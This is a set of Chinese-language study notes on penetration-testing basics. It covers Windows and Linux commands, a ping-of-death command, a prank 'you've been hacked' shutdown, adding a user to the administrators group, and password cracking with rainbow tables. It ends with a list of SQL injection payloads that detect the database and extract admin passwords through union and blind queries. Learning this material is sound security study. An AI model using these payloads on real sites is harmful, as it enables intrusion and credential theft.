渗透基础

安装vmware虚拟机，windows 2003 enterprise edition 镜像，在windows 2003中安装vmware tool工具，
虚拟机可以导出ovf文件，便于拷贝携带

1.网站后缀名是 html 的为静态页面，静态页面相对与动态页面安全性高一些，因为没有数据库
2.修改url大小写可以查看服务器系统，大小写不敏感是windows，敏感是unix
3.伪静态页面，查看是否是静态，测试url
4.C:\Windows\System32\config 下的SAM文件保存用户登陆的账号密码
5.C:\Windows\System32\drivers\etc 下的hosts文件保存解析域名ip
6.C:\Program Files 安装64位程序目录，C:\Program Files (x86) 安装32位程序目录
7.windows 日志，计算机服务，services.msc
8.administrator,注册表regedit

常用DOS命令
color 改变cmd 颜色
ping -t -l 65500 ip 死亡之ping （发送大于64K的文件并一直ping就成了死亡之ping）
ipconfig 查看ip
ipconfig /release 释放ip
ipconfig /renew 重新获得ip
systeminfo 查看系统信息 
arp -a 
net view
ttl 的值是64 ，windows7,2008 linux
shutdown -s -t 180 -c（加后面一句提示） "你被黑了，系统关机"
shutdown -a 取消注销命令
md seven 创建seven目录
rd seven 删除
copy con 123.txt 创建文件并可以写入
type 123.txt 显示文件内容
start 123.txt 打开文件
del 123.txt 删除
tree 显示目录树
net use k:\\192.168.1.1\s$
net use k:\\192.168.1.1\s$ /del

net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 账户名 查看账户的属性
net local Group administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限，
注意：administrators 后加s复数
net user guest 12345 用guest用户登陆后将密码该为12345
net password 密码 更改系统登陆密码
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$ 共享
net share c$ /del 删除C: 共享

F1 显示当前程序或者windows的帮助内容
F2 当你选中一个文件的话，这意味着“重命名”
F3 当你在桌面上的时候是打开“查找：所有文件”对话框
CTRL+F4 关闭当前应用程序中的当前文件（如word中）
F5 刷新
CTRL+F5 强行刷新
CTRl+F6 切换到当前应用程序中的下一个文本（加shift可以跳到前一个窗口）
F10或ALT 激活当前程序的菜单栏
windows键或CTRL+ESC 打开开始菜单
CTRl+ALT+DELETE  CTRL+SHIET+ESC
DELETE 放入回收站
SHIFT+DELETE 直接删除，
CTRL+N 新建一个文件
CTRL+O 打开”打开文件“对话框
CTRL+P 打开“打印”对话框
CTRL+S 保存当前操作的文件
CTRL+X 剪切被选择的项目到剪贴板
CTRL+INSERT 或 CTRL+C 复制被选择的项目到剪贴板
SHIFT+INSERT 或 CTRL+V 
ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作
ALT+SHIFT+BACKSPACE 重做上一步被撤销的操作
Windows键+M 最小化所有被打开的窗口
Windows键+CTRL+M 重新将恢复上一项操作前窗口的大小和位置
Windows键+E 打开资源管理器
Windows键+F 打开“查找：所有文件”对话框
Windows键+R 打开“运行”对话框
Windows键+L 锁屏

win+R 输入msconfig 系统启动项，修改引导启动，加快开机速度

Windows 登陆密码破解
使用启动U盘破解
使用工具破解 lc5 彩虹表

建立多个网站，1.使用不同的端口号  2.使用不同的ip  3.使用不同的域名

linux 使用和命令
red hat enter linux 6
1.从图形界面切换到字符界面，CTRL+ALT+F2
2.命令字 [选项] [参数]
3.快捷键 CTRL+U：清空至行首
4. CTRL+K: 清空至行尾
5. CTRL+L: 清屏
6. CTRL+C: 取消本次命令编辑
7.查看帮助 ls --help or man
8.查看系统相关信息 uname -r 显示内核版本
                   uname -a 显示主机名、内核版本、硬件平台等详细信息
9. which uname 查看命令在何处
10.hostname 查看主机名
11.ifconfig 查看ip
12.cat /proc/cpuinfo 查看CPU信息
13.cat /proc/meminfo 查看内存信息
14.关机操作  shutdown、poweroff
             shutdown -h now
             halt
15.重启   reboot
16.pwd 查看工作目录 print working directory
17.cd  切换工作目录 change directory
18.ls  显示目录内容
19.du  统计目录及文件的空间占用情况 estimate file space usage
20.mkdir 创建新的目录
21.touch 新建空文件，或更新文件时间标记
22.ln 为文件或目录建立链接 link
23.cp 复制文件或目录
24.rm 删除
25.mv 移动
26.find 查找  各种条件
27.vi 编辑器 i 在光标前插入文本

tar 归档，gzip 压缩 
chmod r--4 w--2 x--1 更改权限
rpm 安装软件
rpm -e 卸载软件
yum -y install 安装软件，自动安装依赖
yum -y remove xxx
apt-get install xxx.
dpkg -i xxx
useradd cracer 添加用户
netstat 查看系统网络连接状态、路由表
route 路由 
service network restart 重启网路服务


安装 
yum -y install httpd php mysql mysql-server php-mysql

ls /var/www/html/
service httpd start
service mysqld start



DNS 收集
域名--ip
whois查询
站长工具 http://tool.chinaz.com/
netcraft http://searchdns.netcraft.com
inurl:admin


assess 注入
判断注入点：
'
and 1=1
and 1=2
or 1=1
or 1=2
and 1=23
判断数据库类型
and exists(select * from msysobjects)>0  access
and exists(select * from sysobjects)>0   sqlserver
判断数据库表
and 
判断数据库列名
and exists(select admin from admin)
判断字段长度
order by 20
报错
and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin
数据库联合查询
and 1=2 union select 1,2,admin,4,password,6,7,8,9 from admin
判断账户密码的长度
and(select len(admin) from admin)=5 如果返回正常说明管理员账户的长度为5
and(select len(password) from admin)=5 猜解管理密码长度是否为5
猜解管理员账户的第一个数据
通过判断ascii码来判断
and (select top 1 asc(mid(admin,1,1)) from admin)>100 返回正常说明大于，不正常说明不大于
。。。。。。。。。。。。。